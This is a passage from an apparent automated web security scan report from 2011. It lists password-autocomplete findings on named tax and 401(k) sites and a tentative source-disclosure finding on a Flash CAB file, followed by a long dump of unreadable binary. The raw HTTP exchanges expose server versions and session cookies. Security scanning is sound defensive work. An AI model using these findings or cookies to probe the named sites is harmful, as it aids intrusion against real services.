Cookie: __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1304721456.2; __utmc=131048717; __utmb=131048717.1.10.1304721456
Content-Length: 31

tEmail=Email&pPassword=Password

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:37:53 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Set-Cookie: PHPSESSID=71434cdaab7d48ca4d16e33577c1485b; expires=Fri, 06 May 2011 19:37:53 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4494
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<br />
               <form method="post" name="fTopLogin" action="/login.php">
                   <input name="tEmail" id="tEmail" type="text" value="Email" onfocus="if('Email'==this.value)this.value=''" onblur="if(''==this.value)this.value='Email'" />
                   <input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'==this.value)this.value=''" onblur="if(''==this.value)this.value='Password'" />
                   <input type="submit" value="Login" class="button" />
...[SNIP]...
19.30. https://www.taxnotebook.com/Login/ChangePwd.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.taxnotebook.com
Path:   /Login/ChangePwd.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /Login/ChangePwd.aspx?AccNo= HTTP/1.1
Host: www.taxnotebook.com
Connection: keep-alive
Referer: https://www.taxnotebook.com/Login/TNLogin.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionStateGUID=d3f0c14d-633a-5811-67ba-46ed879ceb86

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:50:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 10090

<img src='../images/tnlogo.gif' width='96' height='23'>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Online federal and state tax preparation.</title>
   
...[SNIP]...
</div>

       <form name="Login" method="post" action="ChangePwd.aspx?AccNo=" language="javascript" onsubmit="javascript:return WebForm_OnSubmit();" id="Login">
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
...[SNIP]...
<BR>
                           <input name="_password" type="password" maxlength="12" id="_password" class="thinborder" onblur="this.className='COLOR1'" onfocus="this.className='COLOR2'" style="width:165px;" /><br>
...[SNIP]...
<BR>
                           <input name="_newPwd" type="password" maxlength="12" id="_newPwd" class="thinborder" onblur="this.className='COLOR1'" onfocus="this.className='COLOR2'" style="width:165px;" /><br>
...[SNIP]...
<BR>
                           <input name="_cnfPwd" type="password" maxlength="12" id="_cnfPwd" class="thinborder" onblur="this.className='COLOR1'" onfocus="this.className='COLOR2'" style="width:165px;" /><br>
...[SNIP]...
19.31. https://www.trpc401k.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.trpc401k.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.trpc401k.com
Connection: keep-alive
Referer: http://www.trpcweb.com/content/account-support
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:45:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=r0m1zyj0xiq1vqe0djlxyhea; path=/; HttpOnly
Set-Cookie: QTWEB=CSS=BLUE3-NS.css&LANGUAGE=; path=/; secure; HttpOnly
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 12169

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html>
<head>
<META http-equiv="Content-Type" content="text/html">
<meta http-equiv="Content-Type" content=
...[SNIP]...
<div class="clearfix" id="logincellscontainer" style="margin:auto;width:100%;">
<form action="default.aspx" id="loginform" method="post" name="loginform" onsubmit="return ProcessLogin();"><input type="hidden" name="LANGUAGE" value="ENG">
...[SNIP]...
<div class="loginforminput"><input type="password" name="PASSWDTXT" id="PASSWDTXT" value="" style="width:120px"></div>
...[SNIP]...
20. Source code disclosure  previous  next
There are 3 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

20.1. http://fpdownload2.macromedia.com/pub/shockwave/cabs/flash/swflash.cab  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://fpdownload2.macromedia.com
Path:   /pub/shockwave/cabs/flash/swflash.cab

Issue detail

The application appears to disclose some server-side source code written in PHP and ASP.

Request

GET /pub/shockwave/cabs/flash/swflash.cab HTTP/1.1
Accept: application/x-cabinet-win32-x86, application/x-pe-win32-x86, application/octet-stream, application/x-setupscript, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: fpdownload2.macromedia.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 12 Apr 2011 23:39:49 GMT
ETag: "123408-2b0224-353a7b40"
Accept-Ranges: bytes
Content-Length: 2818596
Content-Type: text/plain
Date: Sat, 07 May 2011 01:47:44 GMT
Connection: close

MSCF......*.....D.............................*.................X..............;.s .swflash.inf...+........>e. .FP_AX_CAB_INSTALLER.exe...R..@..[...
..QV."C`3.........(d
...BX!..U.hm\n...
Ra...Y.i.
...[SNIP]...
.......O#....@o.....05.L.\..m.J..X?...U.3...j.)....W.k0S...r..%..*..on..v0....g.2..}=......O..&....ab.*.j.h.[..i...R)?.I.c......'".E.....a\........z.... P#.....v.........].^_...h|$.,3/.....OwrS..x.{?n<?........5. .(.......t.0...bE.@..zj.\.p...9..\.,..7...j.UU..H:C.."c.4.__..N...2.=.i..3.....kF.Zq.....x
|*..n.....L..,....-r.D.R.$p...........h.....V.....*E.cS..F..m...0.....w.)a.g.U...S/I.Nlk..[.n....)'.U....QS..,....Hq&6.
..m...d4
%d....>>..~q..(.{3O.N..?...v.vC.p.U....7..QB.8........l...j..
..Dv{..<7z.b.2...B...k..?..T..........=.H...Z....Z..V..r.......4+.usoc.I@..Bk|f.$...../..K.
.\.ur...a.q..C!.d`&ze7.".......Zv~ P.+.p.T..jd.pY.8..3E.^Fm...K..`..E.X..9.a/.C(.....@ M.).R...p.....x?X.......]Y.cc..s..%i.sS~........lI.^....1v.....k$.".........g-[...y.4.>..96q.d..H..N..L%.&C|A^...h.A..z......mU.].5ftT...!.'.ZQ..F.v..F{.v.5%4(....'6..Q,e..3..M.+a@......H..    .._...u.{...z.E0...Q6...C.....w.v<.......6..W..\..'.....i7s....NT....t.....7..^>NP_..n...Mt.9U8{.....w.I.
...4......)....g....u.....P Q.L...AY.M.TK....PY..`q..d...:..#..!......Y.u.....y.......... )L{~.v.I...p<.....@A=^P.6...D
...z. ..crKg..#.[.......6.    ..k:k7.........F.(..dX..X.n...b)%...(.f.J.U.-.TE&...i-...................Uv.Q......L?...G..<........ac.Va).w...S...uE..4.V...TqC..k.2.!-.....Ug....3.|.G....J.....C.:,'.h`.Xv..#...yd/.L...`_.ou...O..^.tro..j........P.*..b...B..'z......F..Z.M$G
\E.u......@....^.4.{./TH...H|?.....{2.@...Y...^8....w.....,.G....}2S+....|.=.jS...:...!........u...b.^...r*.........T..z.b...@....''V.P(........u..g.o..h#/...S.H.D}UT.0.b.@..$WU    .......G.V.W...M.....O.D..kR1e...".....E.....e...).'#@X...Y.}E...c2.r.r ..R.@c.....XV2a.e!.=...4@..33...I....\..cr....4u..4 WK.(`.&...T..d|...)..8...{_..!@v...3....~.:1}h^...>Q.d.Q(....X......x.q_.i.o..0.`y=.ig.}...^f........Z..o..
.......uY......L.sY.;....c..zH8.....)cx.;..'.]Y.Y..MxP..0&{6>O..S.E~Fcu....
.....-..g..X..kpw..6P%S.y:g0..u.EM\=.g?AQ...    .<S<8....$
8...6Yh...t...9fu.W..rF...!N...AL,n^.^.&....NE..@Z.L.s! ....g..gv....pd%....u.sx........=R>.@`'...@w#(w...V......%.........~...k..WF\..7.b..]m.K.X..dN....E/...."...-........O.......Qf.    ../F.......T%.f.(Y9.....<k........d.ToJ9\..,.Vw...r....-R..6.... .V...l........P.[
0G.......^w6...-.sWB...=\d.2{..zX-.....P.+......oc.Iq....&rG.'.;.b..TVWg.p.'.ft._.S.cV.{c....u...U.k.....Y.&.-.scE.....Cx.5x.W..s...i1..pQq.pC...Ya.......Z@.}}.z".........=......Mk.V.................l...a..........B...,..]e.tU+....eN...3]...=....../^..o....
w.#k.T..O..Z..r o....... U.4Wy.se.4..........vW...^.>...O.$5../+1D...$..CD.k..!!O'........ph..o.._......Is..w.....C.j.y....e...`!.m......VR..bP.".....@t[.=....=u.H.5.........#.+{..N.3G.u.Y2..T;Sh..xy.....O/....b...4M.%...o.@.Q.:...p......U.x[.%......_r.H.?.Fo..#....c..\I.^...%....32-^nK.s@.......7.c..z@>.[..m..$.<.1.wnJ.....Zt..ly....8......Y.-.....h.<6*.    .......[C.9w..Fc.L?..'...........[J}N..dC.E{.wS....p|YW.......Q:j..#.....X.rB..........~..(6Pr.y.pc.......|/_8....T#..4..^.W.....W.......4.|.i.......-=.....d..;
.....V.".hp.7..0C.7.9.u.F.v.....TT..\m..e..G.g....h`rlD..kX2kc....'...k.....}>
Lau.@d.}..M.......S.-.........7.....Dy.Q..D.j.'.Y...J..+.I.PS-.....`#.......I    ...E...
...SS.T..![4..eS..K[.g......h.H....%............q.d.....c.$...OWF..%:....hV3..H.{0n.<.4.s..tLk!.'.^'S.VA...C.J}..\lSF...(..<..f.....e&r3...'~.??..?..    .n.....^`-..:/fm.O..6.M~dg4.P...a....)|.....n......0E:.F.Bu.&1.It..$..>@...q}..`U..jQ.Y@s%..8Xa........4uOk/.........^.5.N....43...:.<.e....\)N....!Q...IZ.$x%h*Ns'8"p..\.$.H.M......UF+.n...SP[g..k..,..>....2.R.....Zn4u.
$.UQ..'.gt.|..Q......6;..n....H...V.G....B..&.n..$`>...+...8'..K..>).N..r...x.,...V.:...{...uN~.u..5+J[.h...y]!....b
....).....wu......../.,5"T.p.}..%...Xy"...kS.y6.......Z...us7.,`.]m...ap.0...>.E...u3.wl...1..B...Q....,w5........... .....E.pi.I/ ~..R.]K...G.;..`20c...H.P?p..c..6Z.M..f.....*E..Z...0....MQpw.y..Pj)...I^:..+.F..C..@.M$V...7.....H...n....hXYXV....c.....#E7G....p.M.j>5tD.B5.w.r.\..\1.C..Y!......0.H..?,....oku...{...IJ.    .....U]..^........k^i6V..^...k..v.......]    b....n.    :.... j..Vr....{k......W$.,.tm...NBcJ5.g.__....B0,..".{<...?~.......#    )'H....i......@~..L..t:..@...9`..q$......L]~~..V...f.c.c1........6MK9.....6...P.a...E$+2..pf.E.....'J9..1..R..|]..n......D..~.-...=...)..~|.7#(...4.V..I0...'.=....G?X...E'.....@_].H....N?p.......k{.N.3..}....Q...foo..S+/.H.2.j..E.9oIh..,...T...M..7L...nr..C...X.....Du...............(j..
..d..........C65.2........#..i...RJ.s.tT....7T..`..zf..=p........,...*............(.SN.>.Y9...V..F.z.k.j.}4...._.}.....9YZ&_...d&...*'1I..7..T8L...$.o?.F..)....<{...xaN>&@P..+]52....tr..v,....W....i{..ut.pY95..J....|7...dO?.....E8m....F0F.............V...d,.7...-<...1.....l...|.~1...q.....i&..QD
cQ1J.tN..{..
1HuE.ft..f.n.......e..F....pm..Y.+.....T......y`k.:.$...m~"....Syy[b..[.&Q.dB.wu..y.F...i.Ha..1...#..c...%..}.Fi1.........}    (9.1.....@<cs.|)..Nw...5..u.;.^gO. )9B.4.2..f.M......91...q.J...R,.....6.l)...(........b80>C"%....6.......s...._[.@..W.Z.b..l.........a.l}K..Q...[..w.. ..:..."sd.E....3_..4e.X.:d.F.=g...}YH...1.....[..d..(..#N....`N......^....E*F.M..bu.)..x.....6......H...Ydk......;..ccG..:.......CC...BQ..Z^..j4..E.%Yf.T.x.).a!@^..8;.M...v..lgN7"..[
....P.wb..b.k=..,,...2.HD.R.{H....4......Ey.........f.J./HUh..Fh......W.'.....i.f....I.....y.&...T..r.....R.dK.P...`
..UZ}D.(.[F.h['.C...WVwc.FP... ."...j....F....U...U.,...rjX..:..].Y.i.~.L..g.@!SJ..I...k..z......Y....z....Y...e8l..........;j....f...B^"...l..G%....},. .S@.O.T...\.Vx}=<~.S..
..Q...............:mT..p> .{.u..V.r...S.PMvkZ......mw2..7....D..D.    ..m...S.@..G...u..*....c3..#Ewu.TY..Q4..........[..uW....!.........,..*..    .....+.].<@.........`H6'....\.To..x.v._D.7..H ...$..F...z...K.os...`s..#G..y.@.1.c.V~....3d.......k9...an..V"N...[Z........@g.....>.#..._ .1eKBT*".p..2.ut.@.e....LA&k.u[..K>...3..he.X1t7...(/.<X.&5IP,..Ezz.t...j.#:....l...j@.@..%.M..4....=~...    X(...P...Y..@....NI.u..6...Z.#FjL.G{..A''..4t.....i..............gZ.t..8;8#.]. ...3>....iZ...p.#.........Jt....j.Gt.A1"A@Y..x..Ah..3.DA{..(......h|z.\......`.......I.dJ.2B.e...x..o.:l..2..Pv...IWa.q+....^.i..c. H........I... T...(.X........>.V..o.. .!..............KP?....X....3.....i.9.....$.s..A....V......,..r1_v.b#..^..Lp..J....h$w.....p.._A..&.....}...7..'.W..P,.<5....q<lf.4rv........l..[.'3..D.i.#..ynE...fZKQ.....|.x.].> .0.|....^.>...l..I..q..]..z..T'd......o..3.....$....{rV..o..2.h[Dz...".....i.%2.....R>...E.1".d7di.Q..{g.J%...7......(....Wl.sZ..A.AG{<..n.X.++'t..O.D.u0;h...B.m...... {.Bq.......8..H(p<Uzt..`B.F..H...h......m.1.j.`.w.j....`..|...t.....s...8:..wQ....&.~2..Y....[.....j.@>jeMv.M..#..a..K...../#q...EU..F+..:H".......YI,....W.z.6....C.p...5.D$.y.(.^5.,..B...J.u..g.....i....E.C3U...\*..u.eC.{E...d...]5.Z...qV.s..#W.K......%.....U^w.4H.....r3..7.........B........*...9...|1.v.rS.'...$.?..    ...E.....X*..{3.3'~*....2..;....J...}.........FT5
...{.[.....%....~Y....n.uX.P..X....A....=T../....5yX.......E........@G...O.*......D......8..Yj.kb.V.|s.....4.....`("`...bj...}:.**.(....    V...hb.o.\..z....C.43VDfpg...j.*..m....C....)a.o.6L......2.4X..k......W......R.yk............e.......JxXsR..KM.O1......X.....+....O..O0`........    ....AU......E.....Do}......vJJ........B..}....?q.Yqg..'..........G..}....#V.....?.T.#V.Q._.f......l....N .,'....o......W...4lH.).P...PH....3^...... i]J....$.......$.U....E..#Hw.R&.R.......b.......'......rb..
...A'd....me...a..P...O.&.`M..h..rp....@...A...y2.x..P....I.....:...k`sC.z..    ....[L....q.k90<.M.tf.v._..:d78.6r...J...nN.?......-P..C..L...*.CiiM..).j.Ir....(...{..sE.n.....P.....P.S.Q.Q    ?A.....D1..C|"9.....sA...K...g..:,..*.... ..H...P...P.4.. .....,6Q.Q.=AW..6x..n....`..Q.....AQ.L..i*@%.Q...B3eThs0..w7,8X`.6?...&......JC.*.7.v.g;v...F..#..5.@...%.X..t.X....../..)..c...,.2:.
.......+...XT..+..".......#F.\.k.......b..jTZce..+..s..l
..2} .2~..;z"
.j.
......T..h_].k.......Hl.J.9....
1*...\...rq,..(e.~..o1..3.t...3.`...TiV.!.H^..Bd$..B:Hu"...S=...@..x.I.
.P..$...M@....    ..).p.\U.I..p..W7..    .TJK....
.r...).`D.k...@q....W.}B...n.)....^e..5Ao....c4..,.q..t.f`..`..........(.Y?>.....J.
a.d...G....!]....t. G..H.....QC..T.d..iE.....N...$..i+,\.V.~.-.z.....0^%z..B...z
W`...)[W...lV....f...G.............x.C0]....z....~E....g*.m...S
X)X1.A.......f....*h...s..p......m$...[.vB.
.f.
...[SNIP]...
<.z.A.......G....sf.V.b.n....:J.z..F.7.p&.........%..e.0.hD=.......{c..gm.<?..R9B+.e._...4......JL..1.....T.bkd..M.....O..#...#.A.5H.2..B.......c..rl&U/'.....>8..e...g.w5....9....=_2.s....=`....%8.....&......cy...x...kN%....1(.{.#....J..|.....-.6...K.C..T.../nM.of.X....o..Uk....c.../........3..6_..6...b...j....X....=.".......<.K_{....a...j....)b..k...v...a...}......z~.....EF.".......%....g.y$$....J9_G.F.e.j.g.q..5...}...9@....S^.:..h.q.8.&.k.=t.5L.h.h...{....s.r.#.... .........|#....!/.....i......a..8g..4.......93..(7&>.:6,.Iy.(XH.....$.l8......roz#.LM,.....-..V<2J.N6wF...9.......$.....{..X.........hc..m .V.s.....;.P..7..`.8..^r.^B.3.._9..%e>.Oe........h.V.2;b..p(:..o.../../F.. [.D..$@.......F=......F.r..............C.a.$Qn}d.X&...D~...Gd..8..`.....'....G.$.....b.H...W..G.2u.....[.N...H...V......U!{.tkKv./qW..j....<...eu!..Pu.%UlR..........5..O.4...p.(.d......._...o.@g.}c..Jn......V..6l.1..e.]...Z...}...{.`9-..r.l7..._.......YA.Y4.W[.".d.2.X-F)|Aj.w.n...lN.>X....6`...5y.x.C{.R6.o&...c,...,.mM.C.{.z.a..Y..i.........w%7_v..BwY^..QX..!S/...IF.6....!.3.......{..... .J)....p.09..4...Wr..~K.{%......./.....x..30.......6....k..._$..m..%.J.....(yg.w....2.......J..9".....o.X ..|........r.^{^i8S.c.....Z...|$.....l\4s..G.?..V.J.@.[....@.../{7L"............a.~...~).5.Z{25z...o.j|.+.O..t@7l.....3.JVlkzv.9k...8K2YzI.]tO[..|..{.d:. ..aI.(.=.y..LX$.g,>.0Z..d......6..k.[......O.5`..C../#..E.r.HWl..f.A_B....v.,(..:...of)z.9~../.N...6~.M..}.:..j.#.E}...k./8(Y    8.5)p4.0........@..c.I...a...d..~=@...^.....oK.....-;..@..*.8...'...j5........\..4...E..(F.vM.^. .I.c.8;....p......G.....(9...h.%...K..b....C..nfp!M\.4.$cK.pH....q...b..oL..t...+s..!a........j$...ZQ.kP..w.....vF..9..9...E...0{t.,.fl..2.S\/.3%p...)>....4..1..wE..../......Sy."V8...K.#^v{DF2z......I. ...#2_..0i....d...o.u...~.......w.%.T.'...}...A..c.1.+...2..UJ.. .?..S.Z.2..Z.I..0#..".K.&..N.R..h..6\Q5O.._Q.....C........c2).........)....[.7F....o.0......*...~RA...LN.a/.c.X.....Pa..N..T.&.6j...tgi...    ..X..I..I...r..<....od.#_.I...u..1$.......?.........Mk..w..D.d...$7f.qLrw.>.......    Z...........v..w..^..!V..Al(...3.'.Ei-..6........$...'{..4..=%0......Z....18..Y.......LhgY.o..A#...R......6......3...W..~...s.9........9s..sf.n3...S.......*3"..*...P.1.....%.9B..U..
;v.O`|.7 ^.u..\..w.u1.....zs]...s....7..K...X.[.,............"..........q{...a..Br    ....'..2.........    ..?.o.....k...?+x..D1......?............8    ..-...@..?...~sR.....N..-+...o    ..$..@.P.S.B.*S...G...<%...9ul.......af...$m...D.w#..??.EZ,..........p.......:.@.E..........N.....-.3.Rz.......)}..U.,.I+...K.Wz....4,.....K..q....?.o....4n...o.K..$...*I.(...$..H4Q.X..p.k\.........Um..~.M../C......Zg..k.....0.E6/*...=...C$
.l\.9:.+...`.#..zBl...p...uG..~....    .X....... u..a.Q"........iC.A..-.?....@.7&.?,..^.C0.'..<....3...ja5...~.p..#.b....^....;R....`q..3...-..3..*R..gw..S......%;.0[.....91b1..>...$.D...s...`.Nh..#.({k.92.&-....h..........^~.*7%E...k..3A.......'......j...`.?....v.......T.5.o%....0]..#nq    .)..?.f.K....*...{....-i..M..z.7.})3'..%...o.....>5..#t.. ....mk.R..7.O^...........V.7..t.c.$.0...+J_....Pr+.=H..9+...e.{.J.... .....5....S.>...._7.N....|..V.X...b.3S..W.xd8....MT..W....P..8S....x&\..[.S.....s....U..@7.j..&a.T ...T.Q?...f.......:.q...{.....1eT..y{R....{j..j...ZP"".A.....R.M{..S.`.x6#ox....jP.).x...CxW.rm........8.?Q$G..Pn!.~.    .a.(G.....<A.6qS.]....E=.s.J.....l8.B....,....)PKE...~.J...Ud..P....l.s/.r.55.{.....m,.l]q!..d..r..C....b.vS.a..L....z...59...M.r.%Z ..QA.m.........aJ..(X-.2x..6..tvn..f......l..c[...5)X2vk..........K....v........qc.i)..hl..}X.........#.....,....V...tH..2I.*5.z..&.L.....u....I..,...4.........k.k..._Z.r...uS.D.H..f.r.8u.H.BF.`.q%L....:
.I.Q.1p.9+...M./.|.wPXdz..l{C...Q...zB...k...(.6z=.........X.rZ...    .t..........5.....z....b...QFG....7.....b4..-w......lI..o.[l...b0.h.We.m..H,@..$..T.[.WP....n.Q....s....G..:...IQ..bM5..0.AzSth'x...f....{`.a.......s{...1.<d..&.O)...(7.(RO.e.Du.Q....^.    Xo.J'@..>.9.....a.]g G..~?t...".)...E..2f....i..n..Ra5.....8..qie.......!.e...y..ox../...    ..X....i....9.)z..u.....F(.../u..1.T.]F..    ..wY.    ..,...j'......Y...6@".[M...p.Yl}r.O...........Y]R..2...>.3K*..o.x.C6.....!....z...S.iQ....BGdj..?i2\&..>.u5.AR4.....>.D&.v/.M...o..r....{D%.._7..7.p........V7.
7.?..........`.+d_K....#.....d.yQ.E....,*.b.8.H..7_b.$X..D..Q..L..v...@..[.60s.T.......5.T._.sKB.........2y@.-.....E..f%.d.....OF."P.......i..L    .E....v=...Ntd.%l.....9.D..y &.-...H.Qy.b.j....b...R.C.>..u.bU.(..."8..#.$i..w..oV..........VrC5..B.-.03}.s...4..e#......D.=.
.(......=.?..7E..0..VRr.*.#....-..]..[w..1........7...m..bSnB..|.a...{].k...y.,..(...hp@B......G.Si..r .U.W\b"U!....U.......?..lA.................".v..D;...S.3.)......Tc0;....W.m..@.%...3.....b.-...5...Pi.    f6......X...-..Ap.7.................5....|3........x...............[B......m...G)..}.v7...Q....o`.s!.A.{.X1..<....."C.<...b....b.F..D67.Z......'....S%....^.w....(c...].....9....L..5..[s.U......
#.QN0.@..*~.....vrG:x...q.....^    y(7.j."v........5....."5..P.q.,SoUk.q....t....{.$.K_.h.$.t...@.i....K..?.........2,.&.*.......[.>SX....t.d.k.T....*>.,.+*[A#....?wi....p~AyQ.. R..E.a...#.*p>.C....H...(........U...I.L..%...R.J..E.>H..B....Hl).....&........bX.f6...7..C.......@e>...'u.`J...x.9.$..~&f.Z.M?&..O...".|...u..k.e.j...)..r...|_.7....?2....].)..../.n..g...v..*_..2..=..&....l.......,.....e7n........n^.P.tc.v..x....|74.....L..5..\.!.\...H8.....v.'.z..F-..u$.!..<..S.3.ar..D..U^^4....L...:`0.w.!%..7.. i....{."..3bI;n..?...ZU5.:...c'j..4...V...vu..._...!.Z-8.....%X....-E.F..z...<.x.A.n.-..Qd..Lo.......@
^..@rY....P.5.`"?........@.Z.......{b..W....Z9.....K....5..d.:...._.\    ,a....uJj....v.T.    ..%.w'.L....,.M...T.O0..~...a..S6E....).KF..a.....&.+..utQ9~b^.3.h...s.[<

.t...)H...a.^.
Sg.r.....P.;...9...l..O.y!    6.8E.v.L..}!...?...m.....q..+.IW[{....2Q......c{tk>.........d.d`.....Ym.\<..w.`......I.\.q.._Ts..s..Jh^?.."..A.?`z$...a.<..P.%...........o.x....Nq.R.WHD...z^+..YD.5.Q...UE....Q..(.O.2........G.
....S....Yrn8.}..t....c..$.L.,    qv...../W.....m........6.2......~.-.^.....>l..O.]s|......c...,.T.K...,...FjBW..3.p.[.8\kC.Z..}.4.r.....@6.....9y%..8S...6tpX........8......xG.R..Yh.F....g$..vEz.J..qd-[M:..tU...,.6.69..I.?w=..*.~.bw8...Rv...R..KA.B.Z..c.P3..!G)..    .<.e....?..Z...7?O.H:N.w?..r^2...{.>'<..G......Jf..~..b...G)_.<.*{..[....=.p.)........#..Ld).....}.-.)..^,.d...&..,".yMt.Y....tH...c.o...
.MS...s...wY.D.'!....rj....X.P.\........G.l......_....f......
.........](Gj.i......V......o...Y...{...*GX.N0...~.h&....`..[ X...+.n.]....C.._c>.....q.O.ET.N.:W..\..g_/..k..E...........S..?.&.M...*)AN...#./...
C...Qf.{.K.{.^~..;......O.7&.."O......e.%h.$........k.tW.#<.k1....vD......@..)....K.N...cq...-c..43C....'.....O..G.'F.!....y...    d..?:.m.z.7.0(+...7.C..
........Y.1.+.KIK}...%M{#("b.{p _G.&.Dh.?....S@....U...]h}..a,c......>....X>.hA..rC..E.y.....%........g}kX...&;....7....K.XI.......f...0*.J.716...UAa.../Lc...ct.z. +!..B.......f%..D)g.(! ....{I.....Me.>......p.D...h9^.`".A..o..H'4.[0..)..~.re    L........t.....x..y.E..*l.G#.B?..KJ
....F..........B..'.T*...m..%    j.U....H...A.\..k.Ag. .F......F....T.....@.r.R..3....Z..zA....uQ..;...[4,..k.tG..oI...g........-j...A..}3.#]2fx.i..X........Or..%mV..Q...I.-.9..@.._.....B.......d.*1.8...M....R~vL)h.x.8    G*AW..!.....FW.S.<.[..gv[&..,....9.....@2.z.0."^D    c..F._...0.4...........sY..........b......R...<..?;.V.~.............M....2.Y........k....o..n......X.`Z!-...6....#<..0>.c.....
..Y....y.T....1..g...m...n.9u{.yq....Kc..2]..t.....BG6X.;....5h.1.#e.j...x.;...Q..].XY..`....?..`.?84.AM.....6...kB8....JI........h..UA.i........
.....s.;..d.....>.Y..Z..0Yzk.q9Q..}&.{CJ7S..W...2...H....Z..L8z3..C1...w.
....k...G.0j...z......G$t...."<......R.......&..I...!    ...-..u\...P.F.t..o.KO'.X.J.9.g4.........*.......T5.f......R.q..|..Ev5.....L(J..)..7.8.1...j.....~Z..5.............K.... ..0.....W
....}m..,..g.%.:. .....][.c.]..2..........3.[.yQS.
.8./V....z0W...T>G..!]:.xd.....2GFD..L.4.. ..K..........    ..K@.2J....R.~.....:..wa..{..V}.)Dq...-B.]-..w...Y/....{..)le....&.+.7.tl..../Fp.G..RK..X..;.f*.....tg.........).........~..&8.?@:
...A...;j..9.9j.Q f....Ea.(....[...t...hO..<.a]..>m .l...    Of:..".ci.e[..woYt.|.7...;.......(.....RT..Uj...:...W.c..{......&n..4.C...XWa<_767.&...u!^t.Y....~.......;.^.G.mD`O........P.[oQ.g.$A...t".jC..N...8p....eD.[.......o.F.]..M.5...l.....a#......8...q.n#..*H..}.(........t.s.b....S.............l7.*....w....:.K.#k...5s.U.{...MR.~e_^A...........d...j;.......Y..T....k.@..[..a2q...c.\........H...y&.1..m..,.py..
...XM<OT...7.T+.'#.v.4...!}....k/.lT9r............W(.!4.S.v........@r.>^.}8..A&..2JQ.....0........$KF)Ns6t.~n...d..8W.%/..\.k.}f..SM5....h...H...r.02....=...b....X....o.A[\...*.*r.............q....+.Z..y..\.,.Y.a..x...;.m.Kv..YH#..AV...Pqq.....i.Z.....u+....N7*!KG....Q.....roP.....L....2u|.DF...v..E~....P.w4V......=....Q.7U...,..q.n..u......j..........D.......;Y.W......".b.,q.f."    ..92.6..\..%.;m)..;e.I.w.6..T....    .    .....3.l...Bo.K[)E...\..P ....JV...^b9.%. MA..<....E?
.N....(&<..A1....<'..K#..K..F.?.Y...........
.)R.q.f..L....t8........P.'..),F..T05>.....$j.z..Ki.....i...y....@whz1..(A.."........'.qV1....C...<...    .....G..-8?......'..Q.h.i?.' e.RV.
..>....M..<..    S`H.o...q_I.".......1?3C.......0..7.......A.....N,K..&..o.xr.bA..v%<E.d.#.e^........y...8].?...>.<w...Kj...d......H....j..)s....'....r...P.j...Ou..buv\    .....;./Jo..Fxb..M..2.....8..?i.o........._..9......[...?..G2&U.g.H...".z^U._.4/8tNm....V.Xo@u.H.W.{.....>.XQ$.W....:........_$.....=x.b.......(.....i.......:".^./....j..>. .....]........E...Q..G........d.....N*.Dc.!....}.....D...U...Yu........v.WT.3...%)......JQ.a=Y....M...t+'... LyKR*...4..?..
